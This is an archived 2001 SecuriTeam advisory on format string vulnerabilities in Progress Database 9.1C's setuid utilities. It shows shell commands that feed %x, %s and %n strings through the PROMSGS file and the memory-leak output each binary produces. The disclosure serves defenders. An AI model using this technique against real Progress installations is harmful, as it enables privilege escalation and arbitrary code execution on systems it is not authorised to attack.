[UNIX] Progress Database PROMSGS Format String Vulnerabilities
From: support@securiteam.comDate: 11/07/01
- Previous message: support@securiteam.com: "[NT] Internet Explorer System Information Disclosure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [UNIX] Progress Database PROMSGS Format String Vulnerabilities Message-Id: <20011107062509.37EFB138C0@mail.der-keiler.de> Date: Wed, 7 Nov 2001 07:25:09 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Progress Database PROMSGS Format String Vulnerabilities
------------------------------------------------------------------------
SUMMARY
The <http://www.progress.com/> Progress database is installed with
several utilities that incorrectly parse the provided input file, and are
thus vulnerable to a format string attack. This allows an attacker to
insert format strings into the file, which will cause them to be parsed,
and allow execution of arbitrary code.
DETAILS
Vulnerable systems:
Progress version 9.1C
Example:
$ echo blah > file
$ export PROMSGS=./file
$ ./_probuild
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 290
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 96
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 24
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
Test to make sure they fixed the original hole with the buffer overflows:
$ echo `perl -e 'print "A" x 20000'` > file
$ ./_probuild
Error formatting message 96. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting message 24. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA AA
AAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
However, if you use a format string instead of an 'A', you will get much
better results:
$ echo `perl -e 'print "%x" x 9000'` > file
$ ./_probuild
Error formatting message 96. Message file is corrupt.
0x00x00x3e0x83c63500xbffff81c0x10x00x8062d350x3cc6140x00xbffffd4f0x782578250x782578250
x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7340x80618450x00x83
e3ec00x83e3ec00x83c7b200x900x83c63500xbffff81c0x10xbffff66c0x00x401e5f2c0x10000x401e4
4a00xbffff6680x4013f2bd0x10000x401e5f2c0xbffff7180x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting message 24. Message file is corrupt.
0x837a70e0x83c63500x83e970c0x00xbffff6240x807784b0x40x83e95b00x83c63500xbffff81c0x00x
202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004
d0xbffff5440x83e3ec00xbffff6c40x83166430xbffff5440xbffff6040xc00xbffff5440x83e3ec00xbffff5440
x83e3ec00x83c63500x00x83e3ec00x50x2000x8a0xbffff5ad0x920xbffff56d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
$ echo `perl -e 'print "%s" x 9000'` > file
$ ./_probuild
Error formatting message 96. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
Error formatting message 49. Message file is corrupt.
rcurctr overflow reading promsgs file.
(note the overflow message)
$ echo `perl -e 'print "%n" x 9000'` > file
$ ./_probuild
Error formatting message 96. Message file is corrupt.
0(tty)0(tty)6225424-20201(tty)0(tty)11573-148280(tty)-6892819728197281972819728197281972819
7-2011-225262130(tty)16064160643152014425424-20201(tty)-24520(tty)24364409617568-2456-33
95409624364-2280-3414%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting message 24. Message file is corrupt.
-2277025424-268680(tty)-2524307954-2721625424-20200(tty)82240(tty)1285782468224210571390
41978977-274816064-236426179-2748-2556192-274816064-274816064254240(tty)160645512138-
2643146-2707%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
You should be getting the idea by now...
ALL suids in the dlc/bin dir are affected
$ ./_dbutil
Error formatting message 96. Message file is corrupt.
0x00x00x3e0x81159280xbffff77c0x00x00x805ec350x11cdf40x00xbffffd530x782578250x782578250
x782578250x782578250x782578250x782578250x782578250xbffff7250xbffff72c0x80543750x00x81
222a00x81222a00x81161c00x900x81159280xbffff77c0x00x00x40015b980x7c304040x40012b4b0x
bffff7000x40015a400x804bb1b0x00x10x400c4a4c0x400227c8%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting message 24. Message file is corrupt.
0x80fd96e0x81159280x81271340x00xbffff61c0x806540b0x40x8126fd80x81159280xbffff77c0x00x8
04daea0x00x81222a00x10x81159280x2080xbffff7480xdff00000x00x00x00x616441740x532f0x00x0
0xbffff7800x00x4e2069720x2020766f0x333120320x3a33313a0x322031310xa3130300x8000ff000x
80b00d0c0x3900ffb00x2043312e0x202020200x20202020%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
$ ./_mprosrv
14:03:13 Error formatting message 96. Message file is corrupt.
14:03:13
0x00x00x3e0x812f6280xbffff82c0x10x00x3f0xfff5e40x00xbffffd510x782578250x782578250x782578
250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x80582250x00x813e8c00x
813e8c00x81300200x900x812f6280xbffff82c0x10x400003d40x400157e00x80x40022c140x80x400
c816c0x10x00x400229240xc0b8fae0x400227b8%
14:03:13 errno=0 reading promsgs file, it may have been deleted.
14:03:13 Unable to format message number 940
$ ./_mprshut
Error formatting message 96. Message file is corrupt.
0x00x00x3e0x81802500xbffff82c0x10x00x805af750x1858740x00xbffffd510x782578250x782578250
x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff6a00x80587650x00x81
9b8c00x819b8c00x8180d800x900x81802500xbffff82c0x10x00x00x00x00x00x00x00x00x00x00x0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940
$ ./_proapsv
14:03:33 02 Nov 2001
Error formatting message 96. Message file is corrupt.
14:03:33 02 Nov 2001
0x00x00x3e0x842f7f00xbffff8300xbffff82c0x00x80645050x435d140x00xbffffd510x78
2578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff825
0xbffff4180x80630150x00x84573200x84573200x84312200x900x842f7f00x00xbffff82c0
x40015a400x400154140x40015a400x805527a0xbffff3680x4000d3600x40015b940x40022c
900x70x00x180%
$ ./_progres
Error formatting message 96. Message file is corrupt.
0x00x00x3e0x840eaf00xbffff82c0x10x00x80646750x414ff40x00xbffffd510x782578250x782578250x
782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7440x80631850x00x84
2d1200x842d1200x84105000x900x840eaf00xbffff82c0x10xbffff67c0x00x401e5f2c0x10000x401e44
a00xbffff6780x4013f2bd0x10000x401e5f2c0xbffff7280x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting message 24. Message file is corrupt.
0x83bc8ce0x840eaf00x843296c0x00xbffff6340x807b0fb0x40x84328100x840eaf00xbffff82c0x00x2
02020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d
0xbffff5540x842d1200xbffff6d40x83587c30xbffff5540xbffff6140xc00xbffff5540x842d1200xbffff5540x
842d1200x840eaf00x00x842d1200x50x2000x8a0xbffff5bd0x920xbffff57d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
$ ./_proutil
\Error formatting message 96. Message file is corrupt.
0x00x00x3e0x81ae9480xbffff82c0x10x00x80595d50x1b3f340x00xbffffd510x782578250x782578250
x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x80580e50x00x81
d77200x81d77200x81af4400x900x81ae9480xbffff82c0x10x40015b940x6dcac560x40012b4b0xbffff
6f00x40015a400x804cdee0x400c5a4c0x400227c80x400c255c0x400227c80x0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting message 24. Message file is corrupt.
0x817912e0x81ae9480x81dc5b40x00xbffff6100x806ea1b0x40x81dc4580x81ae9480xbffff82c0x00x
202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004
d0xbffff5300x81d77200xbffff6b00x816cdd30xbffff5300xbffff5f00xc00xbffff5300x81d77200xbffff5300
x81d77200x81ae9480x00x81d77200x50x2000x8a0xbffff5990x920xbffff559%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
$ ./_rfutil
Error formatting message 96. Message file is corrupt.
0x00x00x3e0x812d0080xbffff82c0x10x00x80586b50x1324740x00xbffffd530x782578250x78257825
0x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff71c0x80571c50x00x8
1433e00x81433e00x812d9800x900x812d0080xbffff82c0x10x40015b940x6dcac560x40012b4b0xbff
ff6ec0x40015a400x804c3a70x400c5a4c0x400227c80x400c255c0x400227c80xbffff67c%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940
$ ./prolib
Error formatting message 96. Message file is corrupt.
0x00x00x3e0x806c4480x806e4ac0xbffff5fc0x00x00x00x00xbffffd550x782578250x782578250x7825
78250x782578250x782578250x782578250x782578250x7250xbffff3cc0x804b5590x00x806c4480x8
06e4ac0x7970x00x806e4ac0x00x00x00x00x00x00x00x00x00x00x00x00x0%errno=0
reading promsgs file, it may have been deleted.
Unable to format message number 1943
ADDITIONAL INFORMATION
The information has been provided by <mailto:dotslash@snosoft.com> KF.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Internet Explorer System Information Disclosure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
